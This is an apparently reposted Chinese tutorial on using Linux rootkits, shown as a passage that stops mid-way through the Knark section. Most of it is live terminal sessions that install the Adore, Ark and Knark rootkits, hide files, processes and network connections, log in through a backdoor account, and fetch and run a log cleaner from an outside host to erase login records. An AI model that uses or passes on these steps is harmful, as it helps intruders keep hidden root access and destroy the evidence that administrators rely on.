首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
rootkit的使用
来源:www.vfocus.net 作者:vfocus 发布时间:2005-07-15  

rootkit的使用

一 Rootkit的简介
二 Rootkit的使用
- Adore rootkit的使用
- Ark rootkit的使用
- Knark rootkit的使用
- T0rn rootkit的使用
- Tuxit rootkit的使用
三 结语
Rootkit 的使用

一 Rootkit的简介

Rootkit出现在90年代初,但是是从出现到现在,Rootkit的变种达到不下十几种,并不断的移植到新的系统上. 所以的rootkit在基本上都是由独立的程度组成的. 有人问,那到底rootkit是干什么的呢, 其实rootkit就是为了保留攻击者在进入某主机的后在此电脑上的权利,也可以说rootkit是后门的集合. Rootkit是后门, 那我们就来看看后门. 

后门:
- Login Backdoor 使用login.c来替换掉/bin/login,攻击者就可以使用自己的密码来登陆了.
- Telnet Backdoor 安置木马程序到in.telnetd,使攻击者可以使用自己的密码登陆.
- Services Backdoor 和telnet后门差不多, 替换掉像ftp,rlogin等程序
- Cronjob Backdoor 定时执行某个后门程序.
- Library Backdoor 共享库后门, 在共享库中注入后门程序.
- Kernel Backfoor 内核后门. 把moduls注入kernel中,大都被用来隐藏文件.
- Network traffic backdoor 是这是一般的后门, 比如使用udp协议和icmp的后门,pingshell就是一个例子

像rootkit这样的后门包就结合了上面的后门.它的包里可说是什么都有,给个例子:

[root@chi lrk4]# ls
MCONFIG chksniff inetd procps-1.01 tcpd_7.4
Makefile chsh linsniffer.c psmisc-17 wted.c
README cron3.0pl1 login rootkit.h z2.c
bin fileutils-3.13 rshd
bindshell.c findutils net-tools-1.32-alpha shadow-961025
chfn fix.c passwd sysklogd-1.3

就看看山面这个lrk4.tar.gz的包里都装了什么了.
inetd和login 特洛伊木马程序
bindshell.c 是一个很小的后门
z2.c 和wted.c 是打扫日志的程序
chsh 提升本地用户权限的程序,
fix 文件属性伪造程序
linsniffer.c和chksniff 一个是sniffer程序chksniff是查是否有sniffer在运行.
passwd 和chsh差不多, 都是来提权限的

上面是一段很小的介绍啦.还有的就是像ls,ps,pstree等用来隐藏文件的程序了.

===========================================================

二 Rootkit的使用

======================================================================

2.1 Adore rootkit的使用

adore是一个Linux LKM(Loadable Kernel Module)rootkit。作者是Stealth。可以用于Linux-2.2.x和Linux-2.4.x系列的内核。其核心部分就是一个叫做adore.o的LKM。除此之外,还有一个用于隐藏adore.o的模块cleaner.o,一个控制工具ava,以及一个启动脚本startadore.
---------------------------------------------------------------------------------------

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: chi
Password:
[chi@chi chi]$ su root
Password:
[root@chi chi]# ls
adore-0.42.gz
[root@chi chi]# tar -xzvf adore*
adore/
adore/CVS/
adore/CVS/Root
adore/CVS/Repository
adore/CVS/Entries
adore/CVS/Tag
adore/Changelog
adore/LICENSE
adore/Makefile.gen
adore/README
adore/TODO
adore/adore.c
adore/adore.h
adore/ava.c
adore/cleaner.c
adore/configure
adore/dummy.c
adore/libinvisible.c
adore/libinvisible.h
adore/rename.c
adore/startadore
[root@chi chi]# ls
adore adore-0.42.gz
[root@chi chi]# cd adore
[root@chi adore]# ls
CVS Makefile.gen adore.c cleaner.c libinvisible.c startadore
Changelog README adore.h configure libinvisible.h
LICENSE TODO ava.c dummy.c rename.c
[root@chi adore]# ./configure && make

Starting adore configuration ...

Checking 4 ELITE_UID ... found 30
Checking 4 ELITE_CMD ... using 28460
Checking 4 SMP ... NO
Checking 4 MODVERSIONS ... YES
Checking for kgcc ... found cc
Checking 4 insmod ... found /sbin/insmod -- OK

Loaded modules:
lockd 30344 1 (autoclean)
sunrpc 52132 1 (autoclean) [lockd]
pcnet32 10308 1 (autoclean)
BusLogic 86060 6

Since version 0.33 Adore requires authentication for
its services. You will be prompted for a password now and this
password will be compiled into adore and ava so no further actions
by you are required.
This procedure will save adore from scanners.
Try to choose a unique name that wont clash with normal calls to mkdir(2).
Password (echoed):111111 <------------------输入密码

Preparing /home/chi/adore (== cwd) for hiding ...

Creating Makefile ...

*** Edit adore.h for the hidden services and redirected file-access ***
cp: Makefile: No such file or directory
rm -f adore.o
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=28460 -DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"111111\" -DMODVERSIONS adore.c -o adore.o
cc -O2 -Wall -DELITE_CMD=28460 -DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"111111\" -DMODVERSIONS ava.c libinvisible.c -o ava
cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=28460 -DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"111111\" -DMODVERSIONS cleaner.c
[root@chi adore]# ls
CVS Makefile.gen adore.h cleaner.c libinvisible.c
Changelog README adore.o cleaner.o libinvisible.h
LICENSE TODO ava configure rename.c
Makefile adore.c ava.c dummy.c startadore
[root@chi adore]#

到这里为止adore是安装好了,看看上面那些文件是什么东西来的:

Changelog
LICENSE
Makefile.gen <--如果configure脚本执行失败,可以使用这个文件
README
TODO
adore.c <--adore.o模块的源代码
adore.h
ava.c <--控制命令
cleaner.c <--cleaner.o模块的源代码,用于隐藏adore模块
configure <--安装脚本
dummy.c
libinvisible.c <--libinvisible是ava和adore模块之间的接口
libinvisible.h
rename.c
startadore <--启动脚本

现在我们知道startadore是启动脚本.那就先用它,然后后ava程序.

[root@chi adore]# ./startadore <----- 远程连接的少了个PATH
./startadore: insmod: command not found
./startadore: insmod: command not found
./startadore: rmmod: command not found
[root@chi adore]# find / -name insmod
find: /proc/6/fd: Permission denied
/sbin/insmod
[root@chi adore]# export | grep PATH
declare -x PATH="/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/chi/bin"
[root@chi adore]# export PATH=$PATH:/sbin
[root@chi adore]# export | grep PATH
declare -x PATH="/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/chi/bin:/sbin"
[root@chi adore]# ls
CVS Makefile.gen adore.h cleaner.c libinvisible.c
Changelog README adore.o cleaner.o libinvisible.h
LICENSE TODO ava configure rename.c
Makefile adore.c ava.c dummy.c startadore
[root@chi adore]# ./startadore
[root@chi adore]# <--------------- startadore可以用了

那就试下ava.c好用不:

root@chi adore]# ./ava
Usage: ./ava [file, PID or dummy (for U)]

h hide file <--隐藏文件
u unhide file <--重现文
r execute as root <--以root的权限运行一个程序
R remove PID forever <--永远删除一个进程
U uninstall adore <--卸载adore模块
i make PID invisible <--隐藏一个进程
v make PID visible <--让一个进程重现

[root@chi adore]#

假如我有个文件夹在/tmp下, 我要隐藏它,用adore很简单就可实现.

[root@chi adore]# cd /tmp
[root@chi /tmp]# ls
install.log
[root@chi /tmp]# mkdir rootkit
[root@chi /tmp]# ls
install.log rootkit
[root@chi /tmp]# cd /home/chi/adore
[root@chi adore]# ./ava h /tmp/rootkit
Checking for adore 0.12 or higher ...
Adore 0.42 installed. Good luck.
File /tmp/rootkit hided.
[root@chi adore]# cd /tmp
[root@chi /tmp]# ls <----- 看看/tmp
install.log <----- 你看, rootkit没有了
[root@chi /tmp]#

现在来看看隐藏一个进程....................
[root@chi adore]# ps -a
PID TTY TIME CMD
630 tty1 00:00:00 bash
653 pts/0 00:00:00 bash
673 pts/0 00:00:00 su
674 pts/0 00:00:00 bash
743 pts/1 00:00:00 bash <--- 我们要hide的进程
773 pts/1 00:00:00 su
774 pts/1 00:00:00 bash
807 pts/1 00:00:00 ps
[root@chi adore]# ./ava i 743
Checking for adore 0.12 or higher ...
Adore 0.42 installed. Good luck.
Made PID 743 invisible.
[root@chi adore]# ps -a
PID TTY TIME CMD
630 tty1 00:00:00 bash
653 pts/0 00:00:00 bash
673 pts/0 00:00:00 su
674 pts/0 00:00:00 bash <----看这里进程没有了
773 pts/1 00:00:00 su
774 pts/1 00:00:00 bash
809 pts/1 00:00:00 ps
[root@chi adore]#

我们用root权限来运行一个程序看看................

[chi@chi adore]$ su root
Password:
[root@chi adore]# cp /bin/sh /home/chi/adore/.sh3 <-------- 我们对.sh3也没有加上suid位, .sh3是一个可以执行文件而已.
[root@chi adore]# exit
exit
[chi@chi adore]$ ./ava r .sh3 <---- 注意这里你并不是root.

Checking for adore 0.12 or higher ...
Adore 0.42 installed. Good luck.
[root@chi adore]# <---- 这个时候你才是root.

==============================================================

2.2 Ark rootkit的使用

Ark rootkit全名叫Ambients Rootkit for linux, 我使用的是1.0.1版的.里面主要是是被注入了后门的程序.打开包来看看.

syslogd 如果和/dev/ptyxx/.log里记录的一样的话, 就过滤syslogd里的内容.
login 替换/bin/login, 如果你telnet上的话, user: arkd00r pass: <your password>
sshd 替换sshd程序, ssh上它时用user: root , pass: <your password>
ls 替换ls程序后,用来隐藏文件或程序,要隐藏的内容记录在/dev/ptyxx/.file
du 和ls一样
ps 隐藏进程,要隐藏的内容记录在/dev/ptyxx/.proc
例子:
0 0 所以以root权限运行的进程
1 p0 隐藏进程p0
2 sniffer 隐藏所有的进程里有“sniffer“字节的
pstree 和ps差不多
killall 类似ps
top 类似ps
netstat 隐藏连线和端口.保存在/dev/ptyxx/.addr中.
比如:
0: hide uid
1: hide local address
2: hide remote address
3: hide local port
4: hide remote port
5: hide UNIX socket path
举例:
0 500 <--- 隐藏所有连线属于用户500的
1 128.31 <----隐藏所有本地连接来自128.31.xxx.xxx

接下去, 我们先来安装ark rootkit:

[root@chi chi]# ls
ark-1.0.1.tar.gz
[root@chi chi]# tar -xzvf ark*
ark-1.0.1/
ark-1.0.1/README
ark-1.0.1/ark
ark-1.0.1/compile
ark-1.0.1/du
ark-1.0.1/killall
ark-1.0.1/login-normal
ark-1.0.1/login-shadow
ark-1.0.1/ls
ark-1.0.1/netstat
ark-1.0.1/ps
ark-1.0.1/pstree
ark-1.0.1/sshd
ark-1.0.1/syslogd
ark-1.0.1/top

gzip: stdin: decompression OK, trailing garbage ignored
ark-1.0.1/VERSION
tar: Child returned status 2
tar: Error exit delayed from previous errors
[root@chi chi]# ls
ark-1.0.1 ark-1.0.1.tar.gz
[root@chi chi]# cd ark-1.0.1
[root@chi ark-1.0.1]# ls
README ark du login-normal ls ps sshd top
VERSION compile killall login-shadow netstat pstree syslogd
[root@chi ark-1.0.1]# ./ark
ARK-[ You may want to supply a password..
----[ Usage: ./ark <password>

[root@chi ark-1.0.1]# ./ark 111111 <---- 111111 是你自设置的密码.

ARK-[ Welcome to ARK version 1.0.1..

System info:
+ Host: chi
+ IP: 192.168.25.5
+ Bogomips: 1042.02

Lets see what we got on this baby..
+ Passwd? Shadowed
+ Sshd? Yes

Mmmkay.. Time to backdoor thiz slut.. ;)
+ Syslogd:
+ /sbin/syslogd
+ Login:
+ /bin/login
+ Sshd:
/etc/sshd_config: No such file or directory <----- ssh找不到.
error: fatal: Could not load host key: /etc/ssh_host_key. Check path and permissions.
+ /usr/sbin/sshd
+ Ls & Du:
+ /bin/ls
+ /usr/bin/du
+ Ps, Pstree, Top, Killall:
+ /bin/ps
+ /usr/bin/pstree
+ /usr/bin/killall
+ /usr/bin/top
+ Netstat:
+ /bin/netstat

----[ Backdooring Completed!
[root@chi ark-1.0.1]#

来测试下/bin/login可以用不!

[chi@chi chi]$ telnet localhost <---- telnet自己.
Trying 127.0.0.1...
Connected to chi.
Escape character is ^].

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: arkd00r <---- 用户名arkd00r
Password: <---- 刚才你定义的密码,我这里是111111

[root@chi /root]# <---- 这里你就是root了

可以用了, 那就来看下别的, 运行ps和pstree来看看:

下面这个是在被安装ps程序之前:

[root@chi chi]# ps
PID TTY TIME CMD
691 pts/0 00:00:00 login
712 pts/0 00:00:00 su
713 pts/0 00:00:00 bash
724 pts/0 00:00:00 ps
[root@chi chi]# ps -a
PID TTY TIME CMD
638 tty1 00:00:00 bash
692 pts/0 00:00:00 bash
712 pts/0 00:00:00 su
713 pts/0 00:00:00 bash
725 pts/0 00:00:00 ps

下面这个是在被安装ps程序之后:

[root@chi ark-1.0.1]# ps
PID TTY STAT TIME COMMAND
630 1 S 0:00 login -- root
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
633 4 S 0:00 /sbin/mingetty tty4
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
713 ? S 0:00 bash
818 ? R 0:00 ps
[root@chi ark-1.0.1]# ps -a
warning: `- deprecated; use `ps a, not `ps -a <------- 你看到了没有, 有点不同了!
PID TTY STAT TIME COMMAND
630 1 S 0:00 login -- root
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
633 4 S 0:00 /sbin/mingetty tty4
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
713 ? S 0:00 bash
820 ? R 0:00 ps -a
692 ? S 0:00 -bash

对着这两个ps程序就可以看出不同的地方, 所以这个ps程序并不完善.对不起作者啦, 我只是说说而以,要我写, 我还写不出来,汗~~~~~`
废话我就不说了,来看看, 如何使用这个ps来隐藏! 我上面写了介绍了, ps要用到/dev/ptyxx/.proc, 我们先来看看有没有吧.

[root@chi ark-1.0.1]# cd /dev/ptyxx/
bash: /dev/ptyxx/: No such file or directory
[root@chi ark-1.0.1]# cd /dev
[root@chi /dev]# ls | grep ptyx
ptyx0
ptyx1
ptyx2
ptyx3
ptyx4
ptyx5
ptyx6
ptyx7 <--------- 没有ptyxx,只好自己mkdir啦
ptyx8
ptyx9
ptyxa
ptyxb
ptyxc
ptyxd
ptyxe
ptyxf
[root@chi /dev]# mkdir ptyxx
[root@chi /dev]# cd ptyxx
[root@chi ptyxx]# cat > .proc

[root@chi ptyxx]# ps
PID TTY STAT TIME COMMAND
630 1 S 0:00 login -- root
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
633 4 S 0:00 /sbin/mingetty tty4
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
713 ? S 0:00 bash
831 ? R 0:00 ps
[root@chi ptyxx]#

看看上面这些进程, 现在我要把
633 4 S 0:00 /sbin/mingetty tty4
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
这三个进程隐藏掉, 看我如何做吧

[root@chi ptyxx]# cat >> .proc
1 4
2 login
2 su

[root@chi ptyxx]# ps
PID TTY STAT TIME COMMAND
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
713 ? S 0:00 bash
835 ? R 0:00 ps
[rot@chi ptyxx]#

对照一下就可以看到, 上面三个都没有了!老觉得自己废话好多, 下面来看看ls程序!

[root@chi chi]# ls
ark-1.0.1 ark-1.0.1.tar.gz <---- 要隐藏ark-1.0.1文件夹
[root@chi chi]# vi /dev/ptyxx/.file

ark-1.0.1
~
~
~
~
"/dev/ptyxx/.file" 2L, 14C written
[root@chi chi]# ls <---- 看不到了
ark-1.0.1.tar.gz
[root@chi chi]#

接下去还有个netstat和那个syslogd,我们继续吧, 下面是还没有经过过滤的netstat -a的输出:

[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN
tcp 0 0 *:1024 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:ntalk *:*
udp 0 0 *:talk *:*
udp 0 0 *:937 *:*
udp 0 0 *:1024 *:*
udp 0 0 *:sunrpc *:*
raw 0 0 *:icmp *:* 7
raw 0 0 *:tcp *:* 7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 0 [ ACC ] STREAM LISTENING 528 /dev/printer
unix 0 [ ] STREAM CONNECTED 168 @00000017
unix 1 [ ] DGRAM 882 /dev/log
unix 0 [ ACC ] STREAM LISTENING 617 /tmp/.font-unix/fs-1
unix 0 [ ACC ] STREAM LISTENING 589 /dev/gpmctl
unix 0 [ ] DGRAM 963
unix 0 [ ] DGRAM 741
unix 0 [ ] DGRAM 653
unix 0 [ ] DGRAM 620
unix 0 [ ] DGRAM 571
unix 0 [ ] DGRAM 522
unix 0 [ ] DGRAM 444
unix 0 [ ] DGRAM 433
[root@chi chi]#

当然拉, 我们要把某些连线shadow掉啦, 你看上面那个telnet, 一看就知道有人连你的telnet, 那不完蛋才怪啦!

现在我们要隐藏的是:

tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED
tcp 0 0 *:1024 *:* LISTEN

再来看看输入:

[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:smtp *:* LISTEN <--------- telnet连线变没有了
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN <---------- 1024端口变没有了
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:ntalk *:*
udp 0 0 *:talk *:*
udp 0 0 *:937 *:*
udp 0 0 *:sunrpc *:*
raw 0 0 *:icmp *:* 7
raw 0 0 *:tcp *:* 7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 0 [ ACC ] STREAM LISTENING 528 /dev/printer
unix 0 [ ] STREAM CONNECTED 168 @00000017
unix 1 [ ] DGRAM 882 /dev/log
unix 0 [ ACC ] STREAM LISTENING 617 /tmp/.font-unix/fs-1
unix 0 [ ACC ] STREAM LISTENING 589 /dev/gpmctl
unix 0 [ ] DGRAM 963
unix 0 [ ] DGRAM 741
unix 0 [ ] DGRAM 653
unix 0 [ ] DGRAM 620
unix 0 [ ] DGRAM 571
unix 0 [ ] DGRAM 522
unix 0 [ ] DGRAM 444
unix 0 [ ] DGRAM 433

接下去的就只有一个syslogd要讲了, 如何大家不知道syslogd是如何工作的, 我想你先到网上找看看, 因为对syslogd的了解很重要,:-)

[root@chi chi]# cd /var/log
[root@chi log]# ls
boot.log htmlaccess.log maillog news sendmail.st wtmp
cron httpd messages samba spooler xferlog
dmesg lastlog netconf.log secure uucp
[root@chi log]# cat messages | grep 192.168.25.1
May 1 00:02:56 chi ftpd[659]: FTP LOGIN FROM 192.168.25.1 [192.168.25.1], chi
May 2 00:04:52 chi ftpd[653]: FTP LOGIN FROM 192.168.25.1 [192.168.25.1], chi
May 2 04:20:26 chi ftpd[661]: FTP LOGIN FROM 192.168.25.1 [192.168.25.1], chi
May 2 04:20:52 chi sshd[664]: connect from 192.168.25.1
May 2 04:20:52 chi sshd[664]: log: Connection from 192.168.25.1 port 3429
May 2 04:20:52 chi sshd[664]: log: Could not reverse map address 192.168.25.1.
May 2 04:21:13 chi sshd[665]: connect from 192.168.25.1
May 2 04:21:13 chi sshd[665]: log: Connection from 192.168.25.1 port 3430
May 2 04:21:13 chi sshd[665]: log: Could not reverse map address 192.168.25.1.
May 2 04:21:35 chi sshd[666]: connect from 192.168.25.1
May 2 04:21:35 chi sshd[666]: log: Connection from 192.168.25.1 port 3431
May 2 04:21:35 chi sshd[666]: log: Could not reverse map address 192.168.25.1.
May 2 04:21:41 chi sshd[666]: log: ROOT LOGIN as root from 192.168.25.1 <------ 我使用root上过一次ssh, 完了被记住了!
May 2 04:21:44 chi sshd[666]: log: Closing connection to 192.168.25.1
[root@chi log]#

现在我们先加要过滤的东西到/dev/ptyxx/.log里,然后再用cleaner.sh打扫日志.这样就不会被人发现啦!

[root@chi /root]# vi /dev/ptyxx/.log
192.168.25.1
~
~
~
~
"/dev/ptyxx/.log" 2L, 14C written

[root@chi /root]# wget http://9836.com/exploit/cleaner.sh
bash: wget: command not found
[root@chi /root]# /bin/wget
bash: /bin/wget: No such file or directory <------------ 没有wget
[root@chi /root]# ftp 192.168.25.1 <------------ 只好用ftp
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0).
Name (192.168.25.1:root): chi
331 Password required for chi.
Password:
230 User chi logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
11-17-02 01:14AM 1323 cleaner.sh
226 Transfer complete.
ftp> get cleaner.sh <------- 下载cleaner.sh
local: cleaner.sh remote: cleaner.sh
200 PORT command successful.
150 Opening ASCII mode data connection for cleaner.sh(1323 bytes).
WARNING! 64 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
1323 bytes received in 0.001 secs (1.3e+03 Kbytes/sec)
ftp> by
221
[root@chi /root]# ls
cleaner.sh
[root@chi /root]# ./cleaner.sh
bash: ./cleaner.sh: Permission denied
[root@chi /root]# chmod 777 cleaner.sh <---- chmod成可执行文件
[root@chi /root]# ./cleaner.sh
-------------------------------------------------------------------------
Cleaner 0.1 By DeX <-> dex@raza-mexicana.org <-> www.raza-mexicana.org
-------------------------------------------------------------------------
Word: 192.168.25.1 <------ 消除所以有关192.168.25.1的登陆记录.
===============================================

[ ] /var/log/boot.log
[ ] /var/log/cron
[ ] /var/log/dmesg
[ ] /var/log/htmlaccess.log
Omitiendo /var/log/lastlog
[ ] /var/log/maillog
[X] /var/log/messages
[ ] /var/log/netconf.log
[X] /var/log/secure
[ ] /var/log/sendmail.st
[ ] /var/log/spooler
Omitiendo /var/log/wtmp
[X] /var/log/xferlog
===============================================

3 Logs limpiados.
[root@chi /root]# exit <--- 我们搞定啦,说了好多废话啦, 哈哈!

===============================================================

2.3 Knark rootkit的使用

Knark是由creed@sekure.net编写的, 现在的最高版本是0,59, 不知道有没有人有更高版本的呢, 因为knark 0.59是建立在kernel 2.2.x的, 就是说只能用于redhat 6.x中, 对redhat 7.x的, 就没有效用了!可惜哦,前面的两个rootkit, 我也是在redhat 6.2上测试的. 不过不要紧, cyberwinds把knark移植到了kernel 2.4.3上面了,现在我们又能用啦! 不过因为是版本的问题, knark-2.4.3.tgz只能用于kernel 2.4.3-20版本的mandrake linux的上面!

knark-0.59.tar.gz这个软件包里包括了:
- hidef 用于在系统中隐藏文件
- nethide 用来隐藏/proc/net/tcp和/proc/net/udp中的某些字符串
- ered 用来配置重定向程序的执行
- rootme 用来实现非特权用户获得root访问权限.
- taskhack 用来改变某个运行着的进程的uid和gid.
- rexec 用来远程执行knark-server的命令
因为版本不对, 我只能在redhat 6.2上面测试这个knark-0.59.tar.gz,

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686login: chi
Password:
Last login: Sat May 3 23:03:22 from 192.168.25.1
[chi@chi chi]$ su root
Password:
[root@chi chi]# ls
knark-0.59.tar.gz
[root@chi chi]# tar -xzvf knark*
knark-0.59/
knark-0.59/README
knark-0.59/Makefile
knark-0.59/src/
knark-0.59/src/ered.c
knark-0.59/src/hidef.c
knark-0.59/src/knark.c
knark-0.59/src/modhide.c
knark-0.59/src/rootme.c
knark-0.59/src/taskhack.c
knark-0.59/src/knark.h
knark-0.59/src/rexec.c
knark-0.59/src/nethide.c
knark-0.59/src/author_banner.c
[root@chi chi]# ls
knark-0.59 knark-0.59.tar.gz
[root@chi chi]# cd knark*
[root@chi knark-0.59]# ls
Makefile README src
[root@chi knark-0.59]# make all
cc -Wall -O2 -Wstrict-prototypes -fomit-frame-pointer -pipe -fno-strength-reduce -malign-loops=2 -malign-jumps=2 -malign-functions=2 -include /usr/src/linux/include/linux/modversions.h -I/usr/src/linux/include -c src/knark.c -o knark.o -D__KERNEL__ -DMODULE -DMODVERSIONS
cc -Wall -O2 -Wstrict-prototypes -fomit-frame-pointer -pipe -fno-strength-reduce -malign-loops=2 -malign-jumps=2 -malign-functions=2 -include /usr/src/linux/include/linux/modversions.h -I/usr/src/linux/include -Wno-uninitialized -c src/modhide.c
cc -Wall -O2 -c -o src/author_banner.o src/author_banner.c
cc -Wall -O2 -c -o src/rootme.o src/rootme.c
src/rootme.c: In function `main:
src/rootme.c:38: warning: implicit declaration of function `settimeofday
cc -Wall -O2 -o rootme src/author_banner.o src/rootme.o
cc -Wall -O2 -c -o src/hidef.o src/hidef.c
cc -Wall -O2 -o hidef src/author_banner.o src/hidef.o
strip hidef
cc -Wall -O2 -c -o src/ered.o src/ered.c
cc -Wall -O2 -o ered src/author_banner.o src/ered.o
cc -Wall -O2 -c -o src/nethide.o src/nethide.c
cc -Wall -O2 -o nethide src/author_banner.o src/nethide.o
cc -Wall -O2 -c -o src/rexec.o src/rexec.c
cc -Wall -O2 -o rexec src/author_banner.o src/rexec.o
cc -Wall -O2 -c -o src/taskhack.o src/taskhack.c
In file included from /usr/include/sys/types.h:30, <----- taskhack编辑不成功!
from src/taskhack.c:14:
/usr/include/bits/types.h:95: warning: `__NFDBITS redefined
/usr/include/linux/posix_types.h:22: warning: this is the location of the previous definition
/usr/include/bits/types.h:97: warning: `__FDMASK redefined
/usr/include/linux/posix_types.h:34: warning: this is the location of the previous definition

.......省略
In file included from /usr/include/fcntl.h:33,
from src/taskhack.c:16:
/usr/include/bits/fcntl.h:109: redefinition of `struct flock
make: *** [src/taskhack.o] Error 1
[root@chi knark-0.59]# ls
Makefile README ered hidef knark.o modhide.o nethide rexec rootme src
[root@chi knark-0.59]#

解开了后, 就要先把knark.o插入kernel中.看好了

[root@chi knark-0.59]# insmod knark.o
bash: insmod: command not found
[root@chi knark-0.59]# /sbin/insmod knark.o
[root@chi knark-0.59]# /sbin/lsmod
Module Size Used by
knark 6936 0 (unused) <--------- 可以看到knark被插入
lockd 30344 1 (autoclean)
sunrpc 52132 1 (autoclean) [lockd]
pcnet32 10308 1 (autoclean)
BusLogic 86060 6
[root@chi knark-0.59]# /sbin/insmod modhide.o <---- 插入模块隐藏
modhide.o: init_module: Device or resource busy
[root@chi knark-0.59]# /sbin/lsmod
Module Size Used by
lockd 30344 1 (autoclean) <----- Knark变没有了!
sunrpc 52132 1 (autoclean) [lockd]
pcnet32 10308 1 (autoclean)
BusLogic 86060 6
[root@chi knark-0.59]#

接下去,我对每个可执行文件进行测试.先来看看hidef和unhidef

[root@chi knark-0.59]# ./hidef

hidef.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./hidef /usr/lib/.hax0r
[root@chi knark-0.59]# mkdir /tmp/rootkit <---- 在/tmp下建立一个rootkit文件夹
[root@chi knark-0.59]# ls /tmp
install.log rootkit
[root@chi knark-0.59]# ./hidef /tmp/rootkit <---- 隐藏rootkit文件夹

hidef.c by Creed @ #hack.se 1999 <creed@sekure.net>

[root@chi knark-0.59]# ls /tmp
install.log <---- 看,用ls就看不到了.

[root@chi knark-0.59]# cd /proc/knark
[root@chi knark]# ls
author files nethides pids redirects
[root@chi knark]# cat files
HIDDEN FILES
/tmp/rootkit <---- 要隐藏的文件记录在/proc/knark/files中
[root@chi knark]# cd /home/chi/knark-0.59
[root@chi knark-0.59]# ./unhidef /tmp/rootkit <---- 恢复rootkit文件

hidef.c by Creed @ #hack.se 1999 <creed@sekure.net>
Port to 2.4 by Cyberwinds #Irc.openprojects.net 2001
[root@chi knark-0.59]# ls /tmp
install.log rootkit <---- 又可以看到了
[root@chi knark-0.59]#

下面看看nethide的使用:

[root@chi knark-0.59]# ./nethide

nethide.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./nethide <string>
./nethide -c (clear nethide-list)
ex: ./nethide ":ABCD" (will hide connections to/from port 0xABCD)
 
使用方法:
./nethide <string> 这里的string是你要过滤的字节,这样在root用netstat的时候就看不到你隐藏了的连线了!

连线被记录的/proc/net/tcp和/proc/net/udp,如果你要隐藏某个连线的话, 请先看这个文件.注意这里是16进制.

./nethide -c 清理nethide-list
./nethide ":ABCD" 隐藏有关端口0xABCD的连线,注意这里要用到十六进制.
那我们来实践一下!
[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN
tcp 0 0 *:1024 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:ntalk *:*
udp 0 0 *:talk *:*

........下面还有好多,不打出来了.

现在我们要隐藏的是:

tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED

udp 0 0 *:ntalk *:*

我们先查看/proc/net/tcp和/proc/net/udp, 得到这两个连线的16进制的表达.

